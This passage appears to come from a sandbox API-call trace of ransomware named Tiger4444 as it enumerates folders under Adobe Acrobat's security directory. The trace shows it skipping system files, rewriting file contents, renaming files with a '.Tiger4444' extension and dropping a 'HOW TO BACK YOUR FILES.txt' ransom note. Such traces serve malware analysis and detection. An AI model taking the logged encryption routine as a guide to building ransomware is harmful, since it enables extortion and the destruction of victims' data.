hHeap=0xc50000) returned 1 [0059.385] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0059.385] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0059.385] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=15083795277) returned 1 [0059.385] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0059.385] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72258 | out: hHeap=0xc50000) returned 1 [0059.385] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.385] CloseHandle (hObject=0x2cc) returned 1 [0059.385] CloseHandle (hObject=0x2b8) returned 1 [0059.385] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata.Tiger4444") returned 88 [0059.385] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\addressbook.acrodata"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\addressbook.acrodata.tiger4444"), dwFlags=0x1) returned 1 [0059.386] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd69dbd, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5bfcc0fc, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5bfcc0fc, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CRLCache", cAlternateFileName="")) returned 1 [0059.386] lstrcmpiW (lpString1="CRLCache", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.386] lstrcmpiW (lpString1="CRLCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.386] lstrcmpiW (lpString1="CRLCache", lpString2="Tiger4444.exe") returned -1 [0059.386] lstrcmpiW (lpString1="CRLCache", lpString2=".") returned 1 [0059.386] lstrcmpiW (lpString1="CRLCache", lpString2="..") returned 1 [0059.386] lstrcmpiW (lpString1="CRLCache", lpString2="windows") returned -1 [0059.386] lstrcmpiW (lpString1="CRLCache", lpString2="bootmgr") returned 1 [0059.386] lstrcmpiW (lpString1="CRLCache", lpString2="pagefile.sys") returned -1 [0059.386] lstrcmpiW (lpString1="CRLCache", lpString2="boot") returned 1 [0059.387] lstrcmpiW (lpString1="CRLCache", lpString2="ids.txt") returned -1 [0059.387] lstrcmpiW (lpString1="CRLCache", lpString2="NTUSER.DAT") returned -1 [0059.387] lstrcpyW (in: lpString1=0x30aeb1c, lpString2="CRLCache" | out: lpString1="CRLCache") returned="CRLCache" [0059.387] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664e0 [0059.387] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x86) returned 0xc79288 [0059.387] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664e8 | out: ListHead=0xc66828, ListEntry=0xc664e8) returned 0xc664c8 [0059.387] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd69dbd, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5bfcc0fc, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5bfcc0fc, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CRLCache", cAlternateFileName="")) returned 0 [0059.387] FindClose (in: hFindFile=0xc73048 | out: hFindFile=0xc73048) returned 1 [0059.387] lstrcpyW (in: lpString1=0x30aeb1c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0059.387] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0059.401] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0059.401] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0059.402] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.402] CloseHandle (hObject=0x2b8) returned 1 [0059.402] CloseHandle (hObject=0x2c4) returned 1 [0059.403] GetCurrentThreadId () returned 0xfa8 [0059.403] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664e8 [0059.403] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache" [0059.403] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79288 | out: hHeap=0xc50000) returned 1 [0059.403] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664e0 | out: hHeap=0xc50000) returned 1 [0059.403] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache" [0059.403] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\" [0059.403] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\.BFC0E91B00AE8A0620D3" [0059.403] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0059.407] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0059.416] FlushFileBuffers (hFile=0x2c4) returned 1 [0059.418] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0059.418] CloseHandle (hObject=0x2c4) returned 1 [0059.418] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache") returned 66 [0059.418] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.418] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd69dbd, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5bfcc0fc, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x886cfb3f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0059.419] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.419] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.419] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0059.419] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.419] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd69dbd, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5bfcc0fc, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x886cfb3f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.419] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.419] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.419] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0059.419] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.419] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.419] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x886cfb3f, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x886cfb3f, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x886f5cd0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0059.419] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.419] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0059.419] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bfcc0fc, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5bfcc0fc, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xdf6349d5, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x27d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", cAlternateFileName="0FDED5~1.CRL")) returned 1 [0059.419] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.419] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.419] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="Tiger4444.exe") returned -1 [0059.419] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2=".") returned 1 [0059.419] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="..") returned 1 [0059.419] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="windows") returned -1 [0059.419] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="bootmgr") returned -1 [0059.419] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="pagefile.sys") returned -1 [0059.419] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="boot") returned -1 [0059.419] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="ids.txt") returned -1 [0059.419] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="NTUSER.DAT") returned -1 [0059.420] lstrcpyW (in: lpString1=0x30aeb2e, lpString2="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl" | out: lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl") returned="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl" [0059.420] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", dwFileAttributes=0x0) returned 1 [0059.420] lstrlenW (lpString="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl") returned 44 [0059.420] lstrlenW (lpString="Tiger4444") returned 9 [0059.420] lstrcmpiW (lpString1="39CB0.crl", lpString2="Tiger4444") returned -1 [0059.420] lstrlenW (lpString=".dll") returned 4 [0059.420] lstrcmpiW (lpString1=".crl", lpString2=".dll") returned -1 [0059.420] lstrlenW (lpString=".lnk") returned 4 [0059.420] lstrcmpiW (lpString1=".crl", lpString2=".lnk") returned -1 [0059.420] lstrlenW (lpString=".ini") returned 4 [0059.420] lstrcmpiW (lpString1=".crl", lpString2=".ini") returned -1 [0059.420] lstrlenW (lpString=".sys") returned 4 [0059.420] lstrcmpiW (lpString1=".crl", lpString2=".sys") returned -1 [0059.420] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0059.421] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0059.421] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=15087382919) returned 1 [0059.421] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=637) returned 1 [0059.421] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0059.421] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0059.421] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x580, lpName=0x0) returned 0x2cc [0059.422] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x580) returned 0xbe0000 [0059.423] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0059.423] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0059.423] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0059.423] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0059.423] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0059.424] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0059.424] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0059.424] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0059.424] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=15087862892) returned 1 [0059.426] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0059.426] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0059.426] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.426] CloseHandle (hObject=0x2cc) returned 1 [0059.426] CloseHandle (hObject=0x2b8) returned 1 [0059.426] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.Tiger4444") returned 121 [0059.427] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl.tiger4444"), dwFlags=0x1) returned 1 [0059.428] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bfa5e97, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5bfa5e97, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xdf6322b7, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", cAlternateFileName="CE3388~1.CRL")) returned 1 [0059.428] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.428] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.428] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="Tiger4444.exe") returned -1 [0059.428] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2=".") returned 1 [0059.428] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="..") returned 1 [0059.428] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="windows") returned -1 [0059.428] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="bootmgr") returned 1 [0059.428] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="pagefile.sys") returned -1 [0059.428] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="boot") returned 1 [0059.428] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="ids.txt") returned -1 [0059.428] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="NTUSER.DAT") returned -1 [0059.428] lstrcpyW (in: lpString1=0x30aeb2e, lpString2="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl" | out: lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl") returned="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl" [0059.428] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", dwFileAttributes=0x0) returned 1 [0059.428] lstrlenW (lpString="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl") returned 44 [0059.428] lstrlenW (lpString="Tiger4444") returned 9 [0059.428] lstrcmpiW (lpString1="A0BA5.crl", lpString2="Tiger4444") returned -1 [0059.428] lstrlenW (lpString=".dll") returned 4 [0059.428] lstrcmpiW (lpString1=".crl", lpString2=".dll") returned -1 [0059.428] lstrlenW (lpString=".lnk") returned 4 [0059.429] lstrcmpiW (lpString1=".crl", lpString2=".lnk") returned -1 [0059.429] lstrlenW (lpString=".ini") returned 4 [0059.429] lstrcmpiW (lpString1=".crl", lpString2=".ini") returned -1 [0059.429] lstrlenW (lpString=".sys") returned 4 [0059.429] lstrcmpiW (lpString1=".crl", lpString2=".sys") returned -1 [0059.429] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0059.429] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0059.429] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=15088199896) returned 1 [0059.429] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=425) returned 1 [0059.429] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0059.429] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0059.429] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b0, lpName=0x0) returned 0x2cc [0059.430] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b0) returned 0xbe0000 [0059.431] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0059.431] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0059.431] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0059.431] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0059.431] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0059.432] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0059.432] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0059.432] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0059.432] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=15088477111) returned 1 [0059.432] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0059.432] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0059.432] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.432] CloseHandle (hObject=0x2cc) returned 1 [0059.432] CloseHandle (hObject=0x2b8) returned 1 [0059.432] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.Tiger4444") returned 121 [0059.432] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl.tiger4444"), dwFlags=0x1) returned 1 [0059.432] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bfa5e97, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5bfa5e97, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xdf6322b7, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", cAlternateFileName="CE3388~1.CRL")) returned 0 [0059.433] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0059.433] lstrcpyW (in: lpString1=0x30aeb2e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0059.433] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0059.433] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, 